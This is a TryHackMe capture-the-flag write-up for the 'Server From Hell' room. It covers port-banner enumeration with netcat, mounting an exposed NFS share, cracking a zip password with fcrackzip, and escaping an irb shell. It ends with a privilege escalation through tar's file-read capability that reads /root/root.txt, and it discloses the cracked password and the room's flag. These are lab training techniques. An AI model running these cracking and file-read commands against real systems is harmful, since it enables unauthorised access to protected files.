CTF-Writeups/TryHackMe/Server_From_Hell.md
2020-11-03 23:43:42 +05:00

3.4 KiB

TryHackMe-Server From Hell

Abdullah Rizwan | 05:54 PM | 3rd November ,2020

NMAP

Not shown: 94 closed ports
PORT      STATE SERVICE               VERSION
1/tcp     open  tcpmux?
| fingerprint-strings: 
|   NULL: 
|_    550 12345 0000000000000000000000000000000000000000000000000000000
3/tcp     open  compressnet?
| fingerprint-strings: 
|   NULL: 
|_    550 12345 0000000000000000000000000000000000000000000000000000000
4/tcp     open  unknown
| fingerprint-strings: 
|   NULL: 
|_    550 12345 0000000000000000000000000000000000000000000000000000000
6/tcp     open  unknown
........

There were many ports open in this box so can't really show how many ports were there

Looking at the description of the room it says about starting from 1337 ,so

PORT 1337

nc IP:1337

Welcome traveller, to the beginning of your journey
To begin, find the trollface
Legend says he's hiding in the first 100 ports
Try printing the banners from the ports

This is the message we get when we connect to port 1337

I made a simple script to go over 100 ports and connect to it to grab banner

i=1
while [ $i -ne 100 ]
do 
	nc 10.10.173.96 $i
	i=$(( $i + 1 ))
done

PORT 12345

nc 10.10.173.96 12345
NFS shares are cool, especially when they are misconfigured
It's on the standard port, no need for another scan

PORT 2049

The default port of nfs share is 2049 so lets see if there are any shares that we can mount on our local machine

Now let's mount that share

We only find a backup.zip

But it asks for a password

Fcrackzip

Now lets use this to bruteforce archive's password

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip 


PASSWORD FOUND!!!!: pw == zxcvbnm

But I can't get to extract the files becasue read-only file system , so I used GUI to view what was in these files

And I was able to grab the flag,hint and ssh private key.

Now hint.txt says

2500-4500

I tried to ssh into the box using hades private but ssh port was not on 22

From the results of the scan I searched for ssh with openssh client

And was logged in :D

 Welcome to hell. We hope you enjoy your stay!
 irb(main):001:0> puts 'hello'
hello
=> nil
irb(main):002:0> 

Now this irb is interactive ruby shell just like we get in python so in order to get a /bin/bash shell run

exec '/bin/bash'

Privilege Escalation

Now the room gives us a hint about getcap this command tells that which file or binary has capability to access almost anything on the system so run

getcap -r 2>/dev/null (2>/dev/null ,here 2 just redirects Standard output error to null )

hades@hell:~$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/bin/tar = cap_dac_read_search+ep

Visiting GTFOBINS

https://gtfobins.github.io/gtfobins/tar/

hades@hell:~$ tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'
thm{w0w_n1c3_3sc4l4t10n}
hades@hell:~$